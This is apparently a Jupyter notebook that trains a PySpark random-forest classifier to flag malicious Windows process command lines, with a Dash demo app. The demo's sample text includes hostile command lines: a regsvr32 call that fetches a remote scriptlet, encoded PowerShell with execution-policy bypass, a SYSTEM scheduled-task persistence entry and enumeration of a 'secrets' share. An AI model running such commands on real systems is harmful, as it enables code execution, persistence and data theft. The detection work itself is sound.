In [1]:
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pyspark.ml import feature, evaluation, Pipeline
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
from functools import reduce
from pyspark.sql import DataFrame
from pyspark.sql import Row

In [2]:
conf = (SparkConf()
            .setAppName('random_forest')
            .setMaster('spark://spark-master:7077')
       )
conf.set("spark.executor.memory", "6g")
conf.set("spark.driver.maxResultSize", "0")
conf.set("spark.sql.shuffle.partitions", "6")
conf.set("spark.default.parallelism", "6")
conf.set("spark.driver.memory", "3g") 

<pyspark.conf.SparkConf at 0x7f4b39662c18>

In [3]:
spark = SparkSession.builder.config(conf=conf).getOrCreate()

In [4]:
# load original dataset without bootstrapped samples
df = (spark.read.format('csv')
      .option('inferSchema', 'true')
      .option('header', 'true')
      .option('escape', '"')
      .load('hdfs://namenode:9000/data/no_bootstrap.csv') 
     )

In [5]:
df.count()

52395

# Cleaned dataset from previous model
+ regex and split operations transform the string representation of cmd_line_tokens back to an arraytype

In [6]:
df = (df.select('*')
          .withColumn('class_label', df.class_label.cast(T.DoubleType()))
          .withColumn('cmd_line_tokens', F.regexp_replace(F.col('cmd_line_tokens'), r"(\[)|(\]|\'|\s+)", ''))
          .withColumn('cmd_line_tokens', F.split(F.col('cmd_line_tokens'), ','))
     )
df.select('cmd_line_tokens').show(5, False)

+-----------------------------------------------------------------+
|cmd_line_tokens                                                  |
+-----------------------------------------------------------------+
|[svchost.exe, -k, localservicenonetwork, -p]                     |
|[svchost.exe, -k, localservice, -p, -s, dispbrokerdesktopsvc]    |
|[oobe, windeploy.exe]                                            |
|[oobe, setup.exe]                                                |
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, lmhosts]|
+-----------------------------------------------------------------+
only showing top 5 rows



# Data engineering pipelines 
+ Term Frequency (one-hot): value indicates if feature is present in observation
+ Feature has to be present at least once in dataset and in at least 50 documents

In [7]:
cv_transformer = feature.CountVectorizer(minTF=1, minDF=50, binary=True, inputCol='cmd_line_tokens', outputCol='tf')

In [8]:
estimator = Pipeline(stages=[cv_transformer]).fit(df)

In [9]:
estimator.transform(df).select('cmd_line_tokens','tf').sample(.1).show(5, False)

+------------------------------------------------------------------+---------------------------------------------+
|cmd_line_tokens                                                   |tf                                           |
+------------------------------------------------------------------+---------------------------------------------+
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, eventlog]|(307,[26,27,60,63,111],[1.0,1.0,1.0,1.0,1.0])|
|[program, files, vmware, vmware, tools, vmtoolsd.exe]             |(307,[2,3,144,217],[1.0,1.0,1.0,1.0])        |
|[svchost.exe, -k, localsystemnetworkrestricted, -p, -s, trkwks]   |(307,[26,27,60,63,115],[1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, netsvcs, -p, -s, dmwappushservice]              |(307,[26,27,60,63,77],[1.0,1.0,1.0,1.0,1.0]) |
|[svchost.exe, -k, netsvcs, -p]                                    |(307,[26,27,60,77],[1.0,1.0,1.0,1.0])        |
+------------------------------------------------------------------+------------

In [10]:
len(estimator.stages[0].vocabulary)

307

In [11]:
training_df, validation_df, testing_df = df.randomSplit([0.6, 0.3, 0.1], seed=0)

In [12]:
rf = RandomForestClassifier(featuresCol='tf', labelCol='class_label', maxDepth=6, numTrees=100, 
                            featureSubsetStrategy='sqrt', impurity='gini', seed=0)
rf_estimator = Pipeline(stages=[cv_transformer, rf])
rf_model = rf_estimator.fit(training_df)

In [13]:
rf_model.transform(testing_df).\
    select(F.avg(F.expr('float(class_label = prediction)')).alias('accuracy')).\
    first()

Row(accuracy=0.9818806027083731)

In [14]:
print(rf_model.stages[-1].trees[3].toDebugString)

DecisionTreeClassificationModel (uid=dtc_291b640318df) of depth 6 with 13 nodes
  If (feature 4 <= 0.5)
   If (feature 166 <= 0.5)
    If (feature 105 <= 0.5)
     If (feature 221 <= 0.5)
      If (feature 196 <= 0.5)
       If (feature 211 <= 0.5)
        Predict: 0.0
       Else (feature 211 > 0.5)
        Predict: 1.0
      Else (feature 196 > 0.5)
       Predict: 1.0
     Else (feature 221 > 0.5)
      Predict: 1.0
    Else (feature 105 > 0.5)
     Predict: 1.0
   Else (feature 166 > 0.5)
    Predict: 1.0
  Else (feature 4 > 0.5)
   Predict: 0.0



# Inference

+ The tokens with the most importance all indicate a malicious log and are very similar to the tokens identified in the LR model

In [15]:
vocab = rf_model.stages[0].vocabulary
feature_importance = rf_model.stages[-1].featureImportances.toArray()
vocab_importance_df = pd.DataFrame({'vocab': vocab, 'weight': feature_importance})
vocab_importance_df.sort_values('weight', ascending=False).head(20)

Unnamed: 0,vocab,weight
112,-executionpolicy,0.143163
110,bypass,0.141431
105,-c,0.11593
146,/c,0.064762
195,reg,0.058177
201,hklm,0.044952
166,net,0.042444
182,foreach,0.041691
196,-path,0.030698
211,-recurse,0.030654


# Model Tuning

In [16]:
paramGrid = (ParamGridBuilder() 
                 .addGrid(rf_model.stages[0].minDF, [10, 25, 50]) 
                 .addGrid(rf_model.stages[1].numTrees, [100, 150, 200]) 
                 .addGrid(rf_model.stages[1].maxDepth, [10,15,20])
                 .build()
            )

In [17]:
models = []
for grid in range(len(paramGrid)):
    print("Fitting model {}".format(grid))
    _model = rf_estimator.fit(validation_df, paramGrid[grid])
    models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6
Fitting model 7
Fitting model 8
Fitting model 9
Fitting model 10
Fitting model 11
Fitting model 12
Fitting model 13
Fitting model 14
Fitting model 15
Fitting model 16
Fitting model 17
Fitting model 18
Fitting model 19
Fitting model 20
Fitting model 21
Fitting model 22
Fitting model 23
Fitting model 24
Fitting model 25
Fitting model 26


In [18]:
evaluator = BinaryClassificationEvaluator(labelCol='class_label', metricName='areaUnderROC')
auc_scores = [evaluator.evaluate(model.transform(validation_df)) for model in models]

In [19]:
auc_scores

[0.9838484458608011,
 0.9860924907369966,
 0.9893028032340578,
 0.9839856864261733,
 0.9857787770249302,
 0.9910670938854773,
 0.9823591506249,
 0.9885706086545605,
 0.9899490387870639,
 0.9812327935008511,
 0.9876962510697124,
 0.9904147603844382,
 0.9849219785916473,
 0.987159264296529,
 0.9906935027318806,
 0.9841548861167796,
 0.9890053262269952,
 0.9896885902837206,
 0.9831113288413252,
 0.9879141608753302,
 0.9885881678061258,
 0.9821011266069194,
 0.9870830766807415,
 0.9886321024196658,
 0.9832488632837112,
 0.9884854577898569,
 0.9886340126202544]

In [20]:
best_model_idx = np.argmax(auc_scores)
best_model = models[best_model_idx]
print("Best params: \n\n{}\n".format(paramGrid[best_model_idx]))
print("Best Validation AUC: \n\n{}".format(auc_scores[best_model_idx]))

Best params: 

{Param(parent='CountVectorizer_de7d071f2136', name='minDF', doc='Specifies the minimum number of different documents a term must appear in to be included in the vocabulary. If this is an integer >= 1, this specifies the number of documents the term must appear in; if this is a double in [0,1), then this specifies the fraction of documents. Default 1.0'): 10.0, Param(parent='RandomForestClassifier_b71b3957b9aa', name='numTrees', doc='Number of trees to train (>= 1)'): 150, Param(parent='RandomForestClassifier_b71b3957b9aa', name='maxDepth', doc='Maximum depth of the tree. (>= 0) E.g., depth 0 means 1 leaf node; depth 1 means 1 internal node + 2 leaf nodes.'): 20}

Best Validation AUC: 

0.9910670938854773


## Best model
+ minDF: 10
+ numTrees: 150
+ maxDepth: 20

In [21]:
vocab = best_model.stages[0].vocabulary
feature_importance = best_model.stages[-1].featureImportances.toArray()
best_vocab_importance_df = pd.DataFrame({'vocab': vocab, 'weight': feature_importance})
best_vocab_importance_df.sort_values('weight', ascending=False).head(20)

Unnamed: 0,vocab,weight
112,bypass,0.081502
154,/c,0.077731
109,-c,0.072469
116,-executionpolicy,0.065573
164,net,0.038264
217,reg,0.032583
183,-path,0.026134
243,-name,0.024519
273,/i,0.023925
312,wmic,0.023159


In [22]:
print(best_model.stages[-1].trees[4].toDebugString)

DecisionTreeClassificationModel (uid=dtc_2cb7dd58408f) of depth 19 with 43 nodes
  If (feature 410 <= 0.5)
   If (feature 116 <= 0.5)
    If (feature 206 <= 0.5)
     If (feature 2 <= 0.5)
      If (feature 192 <= 0.5)
       If (feature 274 <= 0.5)
        If (feature 15 <= 0.5)
         If (feature 159 <= 0.5)
          If (feature 199 <= 0.5)
           If (feature 164 <= 0.5)
            If (feature 23 <= 0.5)
             If (feature 353 <= 0.5)
              If (feature 14 <= 0.5)
               If (feature 273 <= 0.5)
                If (feature 141 <= 0.5)
                 If (feature 283 <= 0.5)
                  If (feature 154 <= 0.5)
                   If (feature 115 <= 0.5)
                    If (feature 307 <= 0.5)
                     Predict: 0.0
                    Else (feature 307 > 0.5)
                     Predict: 1.0
                   Else (feature 115 > 0.5)
                    Predict: 0.0
                  Else (feature 154 > 0.5)
                   Predict

# Cross Validation
+ test best_model performance on training dataset

In [23]:
evaluator.evaluate(best_model.transform(testing_df))

0.9909516784318434

# Plotly Dash Code

In [24]:
common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'powershell.exe', '']

import re
def demo_clean_input(s):
    pattern = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
    """, re.VERBOSE)
    
    return ','.join([x.lower() for x in re.sub(pattern, ' ', s).split() if x.lower() not in common_strings and len(x) >= 2])

In [25]:
def get_coefs(tokens):
    """ get the coefficient for tokens passed from GUI and returns as string """
    
    _format = "{}: *{}*\n"
    s = ""

    token_coefs = []
    for token in tokens.split(','):
        try:
            weight = round(vocab_importance_df.loc[vocab_importance_df.loc[:, 'vocab'] == token, 'weight'].values[0], 6)
            s += _format.format(token, weight)
        except:
            weight = 0.0  # token is not in vocabulary, therefore return 0 for weight
            s += _format.format(token, weight)   
    return s

# get_coefs('cmd.exe,/c,/t')

In [26]:
def spark_code(s):
    """ tokenizes the input and calls the existing feature and prediction pipelines to transform the input """
    
    # create tokens
    tokens = demo_clean_input(s)
    print(tokens)
    
    # create dataframe
    _schema = T.StructType([
        T.StructField('cmd_line_tokens', T.StringType(), True),
    ])         
    myrow = Row(cmd_line_tokens=tokens, trusted_path=0, process_name="")
    text_df = spark.createDataFrame([myrow], schema=_schema).withColumn('cmd_line_tokens', F.split(F.col('cmd_line_tokens'), r','))
    
    #transform features using existing pipelines
    features = best_model.transform(text_df)
    
    _features = features.select('cmd_line_tokens').rdd.take(1)[0]['cmd_line_tokens']
    prediction = features.select('prediction').rdd.take(1)[0]['prediction']
    probability = features.select('probability').rdd.take(1)[0]['probability']
    
    coefs = get_coefs(tokens)
    
    result = """
    Tokens: {} \n 
    Probability: {} \n 
    Prediction: {} \n 
    {}
    """
    
    if prediction == 0:
        return result.format(_features, probability, prediction, "*** Benign ***"), coefs
    else:
        return result.format(_features, probability, prediction, "*** Malicious ***"), coefs
                         
# spark_code(r'C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc')
# spark_code(r'"powershell.exe -ExecutionPolicy Bypass -C ""Compress-Archive -Path C:\Users\win10-user3\staged-DestinationPath C:\Users\win10-user3\staged.zip -Force;ls C:\Users\win10-user3\staged.zip | foreach {$_.FullName} | select')

In [27]:
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from jupyterlab_dash import AppViewer
from dash.dependencies import Input, Output

external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

viewer = AppViewer()

app = dash.Dash(name=__name__, external_stylesheets=external_stylesheets)

markdown_text = '''
### Windows process command-line classifier (Random Forest)
Please copy and paste your log in the box below
'''

sample_input_data = r'''
### Example malicious logs 
+ C:\Windows\system32\regsvr32.exe" /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ powershell.exe -ExecutionPolicy Bypass -C "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object"
+ cmd.exe /C "net share"
powershell.exe -ExecutionPolicy Bypass -C "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\Emulate-Administrator-Tasks.ps1\""
### Example benign logs 
+ C:\Windows\system32\dllhost.exe /Processid:{B2FEB3AD-8AE6-42E7-B2E4-60609573B404}
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS 
+ C:\Windows\System32\Upfc.exe /launchtype boot /cv 09o3CnnAskG8AMTNUwkQhQ.0
### Example logs not in dataset
+ cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr "powershell.exe -nop -exec bypass -EncodedCommand $pcode" /sc ONLOGON /RU SYSTEM'
+ cmd.exe /c dir /s /b \\\\FILE001\\secrets
+ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nop -exec bypass -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA
+ cmd.exe /c reg query "\\\\\\\\FILE001\\secrets\\hklm\\system\\currentcontrolset\\control\\terminal server
'''

app.layout = html.Div([
    html.Div([
        html.Div([
            dcc.Markdown(children=markdown_text),
            dcc.Textarea(id='input', value='C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc', style={'height': '50px', 'width': '50%'}),
            
        html.Div([html.Button(children='Submit', id='button', n_clicks=0)], style={'margin': '2px'}),
            
        html.Div([
            dcc.Textarea(id='output', value='', style={'height': '175px', 'width': '50%'}),
            dcc.Textarea(id='coefs', value='', style={'height': '175px', 'width': '25%'})
        ]),
            dcc.Markdown(children=sample_input_data)
        ])
    ])
])
    
@app.callback(
    [Output(component_id='output', component_property='value'),  # set output component on reactive change
    Output(component_id='coefs', component_property='value')],
    [Input(component_id='button', component_property='n_clicks')],  #  reactive input comes from button press
    [dash.dependencies.State('input', 'value')]
)
def on_click(n_clicks, value):
    # call pyspark logic from here
    return spark_code(value)
    

viewer.show(app)